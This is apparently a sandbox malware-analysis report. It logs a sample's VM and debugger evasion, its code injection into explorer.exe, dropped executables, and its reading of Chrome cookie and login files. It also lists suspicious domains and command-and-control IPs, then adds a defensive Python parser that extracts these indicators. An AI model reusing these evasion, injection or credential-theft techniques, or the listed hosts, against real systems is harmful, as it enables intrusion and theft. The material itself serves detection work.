Source: C:\Users\user\AppData\Local\Temp\2A57.exe RDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EAA.exe RDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior (6 identical events)
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior (6 identical events)
Source: C:\Windows\explorer.exe TID: 2328 Thread sleep count: 645 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4460 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2152 Thread sleep count: 211 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2824 Thread sleep count: 486 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4636 Thread sleep count: 112 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3492 Thread sleep count: 88 > 30 Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 645 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 486 Jump to behavior
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EB37.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9763.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B03C.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A28F.exe Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[;
Source: explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2A57.exe, 00000008.00000003.557817185.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.617175126.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW w
Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
Source: explorer.exe, 00000001.00000000.391524561.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0%
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.619137126.0000000000724000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 2A57.exe, 00000008.00000003.525039609.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060092B mov eax, dword ptr fs:[00000030h] 0_2_0060092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600D90 mov eax, dword ptr fs:[00000030h] 0_2_00600D90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_005F092B mov eax, dword ptr fs:[00000030h] 6_2_005F092B
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_005F0D90 mov eax, dword ptr fs:[00000030h] 6_2_005F0D90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007CC56A push dword ptr fs:[00000030h] 6_2_007CC56A
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: kkh.eiwagggg.com
Source: C:\Windows\explorer.exe Domain query: keziheritier.com
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: pelegisr.com
Source: C:\Windows\explorer.exe Domain query: www.rukangiralawchambers.org
Source: C:\Windows\explorer.exe Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe Network Connect: 45.138.74.52 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 179.43.163.115 80 Jump to behavior
Source: C:\Windows\explorer.exe File created: A28F.exe.1.dr Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Memory written: C:\Users\user\AppData\Local\Temp\ECFD.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 2901ACC Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Thread created: unknown EIP: 5291A80 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F9F380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3624 base: F9F380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5300 base: 7FF69BD28150 value: 90 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe Jump to behavior
Source: explorer.exe, 00000001.00000000.322842452.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.333336819.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.359379247.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388189782.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317378275.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00417429
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 0_2_004124E8
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00411E7A
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 0_2_004116A0
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 0_2_0040A737
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00417429
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 4_2_004124E8
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_00411E7A
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 4_2_004116A0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 4_2_0040A737
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_00417429
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 6_2_004124E8
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_00411E7A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 6_2_004116A0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 6_2_0040A737
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
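The behaviour lines in this and the preceding sections are free text, but they carry the indicators a detection engineer wants out of the report: the domains and IP:port pairs explorer.exe contacts after injection, the dropped executables, which process wrote or executed in which other process (and whether the write was a whole PE, "value starts with: 4D5A", or a one-byte patch), the Enum\SCSI disk enumeration used as a VM check, the Zone.Identifier deletions and the deletion of the original sample. The Python below is an added example, not code from the report or the Joe Sandbox product: it parses that line format into a structured record. Its sample input is constructed from lines that appear on this page. Two choices are assumptions rather than report content: github.com is treated as benign infrastructure and not emitted as an indicator, and the hypervisor marker list goes beyond the VMware and Hyper-V strings the report actually shows.

```python
"""Added example (not part of the report): turn "Source: ... Jump to behavior"
lines into structured indicators. SAMPLE_REPORT is constructed from lines on
this page; BENIGN_DOMAINS and VM_MARKERS are this example's assumptions."""
import re
from collections import Counter

ACTIONS = ("Domain query", "Network Connect", "File created", "File deleted",
           "File opened", "Section loaded", "Thread created", "Memory written",
           "Key enumerated", "Binary or memory string")
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<action>" + "|".join(map(re.escape, ACTIONS))
    + r"): (?P<detail>.*?)(?: Jump to (?:behavior|dropped file))?$")
SECTION_RE = re.compile(r"target: (?P<target>.+?) protection: ")
MEMWRITE_RE = re.compile(r"^(?P<target>.+?) base: [0-9A-Fa-f]+"
                         r"(?: value(?: starts with)?: (?P<value>[0-9A-Fa-f]+))?$")
BENIGN_DOMAINS = frozenset({"github.com"})                        # assumption
VM_MARKERS = ("vmware", "hyper-v", "virtualbox", "vbox", "qemu")  # assumption

SAMPLE_REPORT = r"""
Source: C:\Windows\explorer.exe Domain query: kkh.eiwagggg.com
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Network Connect: 45.138.74.52 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 179.43.163.115 80 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A28F.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 2901ACC Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Thread created: unknown EIP: 5291A80 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Memory written: C:\Users\user\AppData\Local\Temp\ECFD.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3624 base: F9F380 value: 90 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\tfgatra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
"""


def parse_line(line):
    """Split one behaviour line into (source, action, detail); None if unknown."""
    m = LINE_RE.match(line.strip())
    return (m.group("source"), m.group("action"), m.group("detail")) if m else None


def injection_event(source, action, detail):
    """Normalise the cross-process write/execute actions into one record.
    pe_header is set when the written bytes start with 4D5A ("MZ"): a whole PE
    mapped into the target, as opposed to a byte patch such as 90 (NOP)."""
    value = ""
    if action == "Section loaded":
        m = SECTION_RE.search(detail)
        target = m.group("target") if m else "unknown"
    elif action == "Thread created":
        target = detail.split(" EIP:")[0]
    else:  # Memory written
        m = MEMWRITE_RE.match(detail)
        target = m.group("target") if m else "unknown"
        value = (m.group("value") or "") if m else ""
    if target == "unknown":
        return None
    return {"source": source, "action": action, "target": target,
            "pe_header": value.upper() == "4D5A"}


def extract_iocs(report_text, sample_path):
    """Collect indicators from a block of behaviour lines."""
    iocs = {"domains": set(), "endpoints": set(), "dropped_files": set(),
            "injection": [], "vm_checks": Counter(), "vm_artifacts": set(),
            "motw_tamper": set(), "self_delete": False}
    for raw in report_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        source, action, detail = parsed
        if action == "Domain query" and detail.lower() not in BENIGN_DOMAINS:
            iocs["domains"].add(detail)
        elif action == "Network Connect":
            ip, port = detail.split()
            iocs["endpoints"].add((ip, int(port)))
        elif action == "File created" and detail.lower().endswith(".exe"):
            iocs["dropped_files"].add(detail)
        elif action in ("Section loaded", "Thread created", "Memory written"):
            event = injection_event(source, action, detail)
            if event:
                iocs["injection"].append(event)
        # Enumerating Enum\SCSI exposes disk vendor strings (the report's
        # "disk enumeration" VM check); count it per process.
        elif action == "Key enumerated" and detail.upper().endswith(r"\ENUM\SCSI"):
            iocs["vm_checks"][source] += 1
        elif action == "Binary or memory string" and any(
                marker in detail.lower() for marker in VM_MARKERS):
            iocs["vm_artifacts"].add(detail)
        elif action == "File opened" and ":Zone.Identifier" in detail and "delete" in detail:
            iocs["motw_tamper"].add(detail.split(":Zone.Identifier")[0])
        # Deletion of the original sample by any process (here the injected
        # explorer.exe) is the "deletes itself after installation" behaviour.
        elif action == "File deleted" and detail.lower() == sample_path.lower():
            iocs["self_delete"] = True
    return iocs
```

The memory-string markers only show that the analysis host was a VM (the VMware and Hyper-V strings come from the sandbox's own hardware), so vm_artifacts describes the environment, not the sample; vm_checks, the repeated Enum\SCSI enumeration by file.exe and F4FD.exe, is the sample's own evasion behaviour.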

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
